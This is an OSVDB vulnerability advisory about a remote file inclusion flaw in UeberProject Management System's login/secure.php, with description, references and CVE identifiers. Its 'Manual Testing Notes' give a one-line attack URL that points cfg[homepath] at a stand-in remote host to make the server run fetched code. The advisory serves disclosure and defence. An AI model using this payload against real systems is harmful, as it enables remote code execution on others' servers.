UeberProject Management System login/secure.php cfg[homepath] Variable Remote File Inclusion

2006-10-24T09:48:50
ID OSVDB:30015
Type osvdb
Reporter xoron(x0r0n@hotmail.com)
Modified 2006-10-24T09:48:50

Description

Vulnerability Description

UeberProject Management System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to login/secure.php not properly sanitizing user input supplied to the 'cfg[homepath]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

UeberProject Management System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to login/secure.php not properly sanitizing user input supplied to the 'cfg[homepath]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[script_path]/login/secure.php?cfg[homepath]=http://evil_script?

References:

Vendor URL: http://sourceforge.net/projects/ueberp Secunia Advisory ID:22565 ISS X-Force ID: 29775 Generic Exploit URL: http://www.milw0rm.com/exploits/2640 FrSIRT Advisory: ADV-2006-4186 CVE-2006-5539 Bugtraq ID: 20719